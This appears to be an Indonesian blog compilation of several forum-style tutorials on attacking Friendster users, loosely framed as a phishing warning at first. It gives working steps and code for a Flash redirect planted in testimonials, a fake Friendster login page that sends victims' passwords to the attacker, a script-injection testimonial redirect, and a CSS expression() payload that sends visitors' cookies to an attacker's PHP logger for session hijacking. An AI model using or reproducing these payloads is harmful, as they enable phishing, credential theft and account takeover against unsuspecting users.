Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("http://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!

Caranya masukkan kode berikut :


<object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’400′ height=’250′><param name=’movie’ value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’ /><embed src=’http://numpang.com/out.swf‘ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’400′ height=’250′ allowScriptAccess=”never”></embed></object>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

Pesan buat anak2 ABG pecinta Friendster :

Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 – 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!

HACK DENGAN USERNAME

hehe,., klo yang dulu hack password udah ga bekerja,.,. sekarang ada metode baru nih dari yogyafree……, metode ini cukup simple. kita ga perlu yang namanya hostingann atau upload php/script segala macem… kita cuma butuh sebuah media box yang diisi ama script html,, nah script htmlnya bisa diambil disini nih…….

http://www.fileden.com/ ato
http://www.zjsfz.gov.cn nah ini website buat ngupload gw… kena hack bro

Trus buka scriptnya di word nah maka akan tertampil seperti ini

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″><meta name=”description” content=”Friendster is a leading global social network emphasizing genuine friendships and the discovery of new people through friends. Search for old friends and classmates, stay in better touch with friends, share photos and videos, and so much more!”><title>Friendster – Log In</title>
<link rel=”stylesheet” type=”text/css” media=”screen, print” href=”http://images.friendster.com/200707A/css/home.css”>
<link rel=”stylesheet” type=”text/css” media=”screen, print” href=”http://images.friendster.com/200707A/css/interior.css”>
<link rel=”stylesheet” type=”text/css” media=”screen, print” href=”http://images.friendster.com/200707A/css/globnav.css”>
<link rel=”SHORTCUT ICON” href=”http://images.friendster.com/images/friendster2.ico”>
<script type=”text/javascript”>
window.name=”friendster”;
function loginf() {
if (document.login_form.email.value != ”) {
if (document.login_form.password.value != “”) {
document.login_form.password.select();
}
document.login_form.password.focus();
} else {
document.login_form.email.focus();
}
}
</script><script type=”text/javascript”>
var pageViewerID = “”;
var pageOwnerID = “”;

dan bla….bala…bla… panjang deh

sesudah itu kita buka fs kita… login tentunya…. trus pada pada home menu ato profile, kita klik kanan lalu klik view page source dan cari tulisan yang diwarnai orange dari script diatas contohnya :

var pageOwnerID = “0918847764“;

nah itu merupakan nomor ID fs kamu… sekarang copy yang diwarna biru (dari fs kamu tentunya). ke script yang di donlot tadi…..

trus buka file yang udah ditambah ama ID kamu itu, dan copy pastekan semua script ke web ini
nah klik tombol generate di web tersebut : trus copy pastekan script yang udah di generate ke media box kamu….. and selesai :

nah ==> script ini bekerja klo target ato orang lain ngeliat ke friendster kamu..,.,. trus dia secara ga sadar ngirim username ama passwordnya ke messages you…. hehe ini kemungkinan berhasilnya besar loh.. new release dari yogyafree loh….

Friendster… Makin banyak yang maniak, makin banyak para hacker yang mencari ceLah kelemahan ini…Salah satunya adalah melakukan alih halaman, lewat testimonial yang diberikan..

Langkahnya:
1. Login Friendster
2. Cari Target yang ingin di testi
3. TuLis Testi dengan Format::
_mulai testi_
woi.. Aga Kareba? Kapan ke kos?<img id=”Van_Jogja_Community” width=”0″><script>window.location=”http://Link-yang-akan-di-tuju.com”;</script>
_akhir testi_

Apa yang terjadi??
Pada saat target membuka pending testinya, maka sang target akan dialihkan ke halaman lain yang telah kita buat..
Seperti halaman deface, Form Login palsu, atau apalah iTu.. ntar malah ngerusak imajinasi kalian semua.
Sehingga sang target, tidak dapat membaca pending testimonials yang masuk, karena telah dialihkan ke halaman yang telah kita injeksikan tadi
Hikz..Hikz.. kasian juga ya.. :p
MaaF Kalau ArtikeL ini kelihatan ndeso, katro, ataupun kutukupret. ;p
Mungkin tulisan ini hampir sama dengan re-direct lewat testi di artikel sebelumnya.
Sebenarnya, hal ini bisa diakalin untuk hal- hal yang lebih berguna.

ebelumnya maap klo ripos..

Ga usah pake basa basi

Yang perlu di sediakan:

1. Punya account FS (Wajib)
2. Punya website yg support PHP
3. Pake Firefox !! (Yay..!! FF Rules..!!)
4. Extension Add n Edit Cookies, Download Buat FF 0.9 – 1.6 , Buat FF 2.0
5. Rokok, Kopi and cemilan. Biar ga BT or Laper

Langkah² :

1. Bikin file cook.php (nama diganti yg lain juga bisa). Isi dari file:
   PHP Code:

   < ?php
$kokis = $HTTP_GET_VARS[‘kukis’];
$filename = “cok.log”;// metoda dengan append append$handle = fopen($filename, ‘a’);
   fwrite($handle, $kokis);

   fClose($handle);
   // redirect-in ke punya tmn lo
   echo “document.location=\’http://www.friendster.com/\’;“;

   ?>

2. Upload file tersebut ke web hosting lw yg support PHP.
3. Login ke FS
4. Masuk ke edit profile yg bagian CSS (Customize)
5. Paste code berikut di bagian CSS
   Code:

   body{
   height:expr/**/ession(document.location='http://www.site-elu.com/cook.php?kukis=’+document.cookie)
   }

   Ganti www.site-elu.com dengan domain lw.

Udahh…
Loh kok udah..?? Trus nge-hacknya gimana..??

Sabar broo.. Setiap orang yg buka profile lw dengan browser Internet Explorer, cookiesnya akan tercatat di file cok.log di site lw.

Cara gunainnya:

1. Buka _http://www.site-elu.com/cok.log
2. Cari cookies dengan nama friendster_auth=, yang lain di biarin aja. Contoh hasil :
   Code:

   uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
   ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*

   Replace karakter ascii “=” dengan %3D
   Replace karakter ascii “?” dengan %26
   Replace karakter ascii “*” dengan %2A
   Hasilnya :

   Code:

   uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac%3D
   ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk%2A

3. Bukan AnEC Cookie Editor Di FF
4. Filter cookies dari Friendster.com
5. Cari nama cookies friendster_auth, edit!
6. Ganti contentnya dengan yg sudah kita dapat. Save! Cookies lain dari friendster boleh dihapus.
7. Buka _http://www.friendster.com/ dan silahkan nyengir